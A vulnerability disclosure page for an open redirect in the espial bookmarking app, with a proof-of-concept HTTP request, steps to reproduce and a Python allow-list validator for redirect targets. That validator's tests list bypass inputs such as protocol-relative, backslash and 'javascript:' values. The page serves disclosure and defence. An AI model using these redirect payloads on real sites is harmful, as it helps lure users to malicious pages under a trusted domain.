Open Redirect in jonschoning/espial

Valid

Reported on

Sep 25th 2021


Description

Open redirect on the add URL (/add) via the ?next= parameter: the value is used as the post-creation redirect target without being restricted to a path on the application's own origin.

Proof of Concept

// PoC.request
POST /api/add HTTP/2
Host: esp.ae8.org
Cookie: _SESSION=t0+3lyA0gi4m/WOulD20ZJpY+2nW6ePHcVdc+I8Q+XV5W2b9qkCTm9/L9zYKNYg+rG7YmGyRg7SSZnGGG8NcZlrvXly7uPAUFtXaU+NzgjFoAwV8VSKA6KjB3JKwVxarCcSfW519/RjCDJJpq0ZBguQqPm4qF+dbAdIzAiP5XogmlVajF+8k9+UqxvpbGkZ6e3VGBdhOi44wL/AfySUfkxpro+yEVfeeBrLi3wefGrt4/SyZYivwQql8QocZQ/J2+p5UegTvYByqQlD8obT1p4BrmFecBq07y1KGpXDw+u76m4zF3NPw2pUJVKMD1rolqu3r+c/Z7htvP4A=; XSRF-TOKEN=rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Xsrf-Token: rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
Content-Type: application/json
Content-Length: 183
Origin: https://esp.ae8.org
Referer: https://esp.ae8.org/add?next=https://google.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"url":"http://test.com","toread":null,"title":"Home - Test.com","time":null,"tags":null,"slug":null,"selected":null,"private":false,"description":"test","bid":null,"archiveUrl":null}

Steps to Reproduce

Access the add URL with an external ?next= value: https://esp.ae8.org/add?next=https://google.com

After the bookmark is created successfully, the application redirects the browser to google.com

Impact

This functionality does not restrict the next parameter to relative URLs within the application, so an attacker could leverage it to fool an end user into believing that a malicious URL they were redirected to is a legitimate part of the application.
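The defensive check that closes this class of bug is to accept a next value only when it is a path on the application's own origin and to fall back to a fixed default otherwise. The following is an added illustration written for this page, not espial's own fix (espial is a Haskell/Yesod project, and its patch is not reproduced here); the function names, the default of "/" and the sample inputs are assumptions. It covers the external URL from the report plus the protocol-relative and backslash variants that a naive "starts with /" check lets through.

```python
from urllib.parse import urlsplit

# Where to send the user when the supplied next value is not acceptable (assumed default).
DEFAULT_NEXT = "/"


def is_local_redirect(target: str) -> bool:
    """Return True only if target is an absolute path on this origin (e.g. "/add?tag=x").

    Anything with a scheme or host, anything protocol-relative ("//host", "///host"),
    and anything containing backslashes or control characters is rejected, because
    browsers normalise those forms into a navigation to another origin.
    """
    if not target:
        return False
    # Browsers strip tabs/newlines and treat backslashes as forward slashes before
    # parsing, so "/\evil.example" would become "//evil.example". Reject them outright.
    if any(ch.isspace() or ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return False
    if "\\" in target:
        return False
    # "//host" and "///host" are protocol-relative in browsers; urlsplit reports an
    # empty netloc for "///host", so check the raw string rather than the parsed parts.
    if target.startswith("//"):
        return False
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return False  # "https://google.com", "javascript:...", "//host" all land here
    # Require an absolute path so that the redirect stays within the application.
    return parts.path.startswith("/")


def safe_next(target: str, default: str = DEFAULT_NEXT) -> str:
    """Return target if it is a same-origin path, otherwise the default."""
    return target if is_local_redirect(target) else default


if __name__ == "__main__":
    # Constructed sample inputs: the value from the report plus common bypass shapes.
    for candidate in [
        "https://google.com",      # the report's PoC value -> falls back to "/"
        "//evil.example",          # protocol-relative -> "/"
        "///evil.example",         # also protocol-relative in browsers -> "/"
        "/\\evil.example",         # backslash normalised by browsers -> "/"
        "javascript:alert(1)",     # scheme -> "/"
        "/add?tag=security#top",   # same-origin path -> kept
    ]:
        print(f"{candidate!r:28} -> {safe_next(candidate)!r}")
```

The check is deliberately allow-list shaped: rather than trying to enumerate every host or scheme that must be blocked, it accepts exactly one form (an absolute path with optional query and fragment) and treats everything else as untrusted. If the application genuinely needs to redirect to a handful of external sites, the right extension is an explicit list of permitted hosts compared against the parsed netloc, not a looser version of this test.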

We have contacted a member of the jonschoning/espial team and are waiting to hear back 2 months ago
Jon Schoning validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jon Schoning confirmed that a fix has been merged on db00a1 2 months ago
The fix bounty has been dropped